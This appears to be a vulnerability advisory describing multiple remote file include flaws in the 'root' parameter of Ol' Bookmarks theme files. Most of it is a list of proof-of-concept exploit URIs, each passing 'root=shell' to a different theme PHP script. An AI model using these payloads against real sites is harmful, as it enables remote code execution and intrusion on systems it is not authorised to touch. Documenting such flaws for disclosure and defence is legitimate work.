Ol' Bookmarks Themes Root Parameter Multiple Remote File Include Vulnerabilities

Ol' Bookmarks Themes Root Parameter Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/path/themes/blackorange.php?root=shell
http://www.example.com/path/theme/default.php?root=shell
http://www.example.com/path/theme/frames1.php?root=shell
http://www.example.com/path/theme/frames1_top.php?root=shell
http://www.example.com/path/theme/test1.php?root=shell
http://www.example.com/path/theme/test2.php?root=shell
http://www.example.com/path/theme/test3.php?root=shell
http://www.example.com/path/theme/test4.php?root=shell
http://www.example.com/path/theme/test5.php?root=shell
http://www.example.com/path/theme/test6.php?root=shell
http://www.example.com/path/theme/frames1_left.php?root=shell
http://www.example.com/path/theme/frames1_center.php?root=shell